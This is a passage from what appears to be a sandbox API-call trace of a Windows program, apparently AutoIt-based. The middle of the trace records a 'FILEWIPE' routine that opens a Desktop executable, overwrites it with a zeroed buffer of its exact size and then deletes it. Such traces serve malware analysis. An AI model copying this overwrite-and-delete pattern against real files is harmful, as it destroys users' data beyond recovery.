| out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0167.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0167.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0167.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0167.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0167.540] FreeLibrary (hLibModule=0x74f20000) returned 1 [0167.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0167.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0167.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0167.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0167.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0167.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0167.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0167.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0167.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0167.540] CloseHandle (hObject=0x138) returned 1 [0167.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0167.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0167.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0167.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0167.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0167.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0167.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0167.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0167.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0167.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0167.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0167.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0167.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0167.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0167.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0167.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0167.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0167.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0167.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0167.541] CloseHandle (hObject=0x120) returned 1 [0167.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0167.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0167.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0167.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0167.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0167.645] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0167.648] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc1a62260, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc1a62260, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc3764e80, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0xdc800, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="testers.exe", cAlternateFileName="")) returned 0x90af58 [0167.648] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0167.649] CharLowerBuffW (in: lpsz="byte[903168]", cchLength=0xc | out: lpsz="byte[903168]") returned 0xc [0167.656] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0167.656] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0167.656] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0167.657] FreeLibrary (hLibModule=0x75c90000) returned 1 [0167.657] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.657] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.657] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.657] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0167.658] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.658] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.658] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.658] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.658] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.658] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.658] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.658] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.658] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.658] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.658] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.658] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.658] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.662] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.663] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.663] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.663] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0167.663] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0167.665] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\testers.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0167.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0167.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0167.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0167.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0167.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0167.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0167.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0167.666] FreeLibrary (hLibModule=0x75990000) returned 1 [0167.666] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0167.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0167.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0167.666] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0167.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0167.666] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0167.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0167.666] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0167.666] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0167.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0167.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0167.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0167.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0167.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0167.667] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0167.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0167.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0167.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0167.667] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0167.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0167.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0167.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0167.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9ba420 [0167.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9ba420, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0167.671] FreeLibrary (hLibModule=0x75990000) returned 1 [0167.671] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0167.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0167.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0167.672] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0167.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0167.672] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0167.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0167.672] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0167.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0167.672] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0167.672] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0167.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0167.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0167.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0167.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0167.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0167.672] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0167.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0167.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0167.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0167.673] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0167.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0167.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0167.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0167.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3a8 [0167.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd3a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0167.674] FreeLibrary (hLibModule=0x75990000) returned 1 [0167.674] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0167.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0167.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0167.674] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0167.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0167.674] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0167.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0167.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0167.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0167.674] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", lpFilePart=0x0) returned 0x31 [0167.676] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc1a62260, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc1a62260, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0x94b61c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xdc800, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="testers.exe", cAlternateFileName="")) returned 0x90af58 [0167.677] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\testers.exe")) returned 1 [0167.687] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc1a62260, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc1a62260, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0x94b61c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xdc800, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="testers.exe", cAlternateFileName="")) returned 0 [0167.687] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0167.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0167.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0167.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0167.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0167.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0167.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0167.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0167.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0167.688] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 1 [0167.688] TranslateMessage (lpMsg=0x87f36c) returned 0 [0167.688] DispatchMessageW (lpMsg=0x87f36c) returned 0x0 [0167.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0167.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0167.688] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ea08) returned 1 [0167.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0167.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.690] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0167.690] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0167.690] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0167.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0167.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0167.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0167.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0167.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0167.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0167.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0167.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0167.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0167.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0167.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0167.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0167.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0167.690] HeapFree (in: hHeap=0x8a0000, 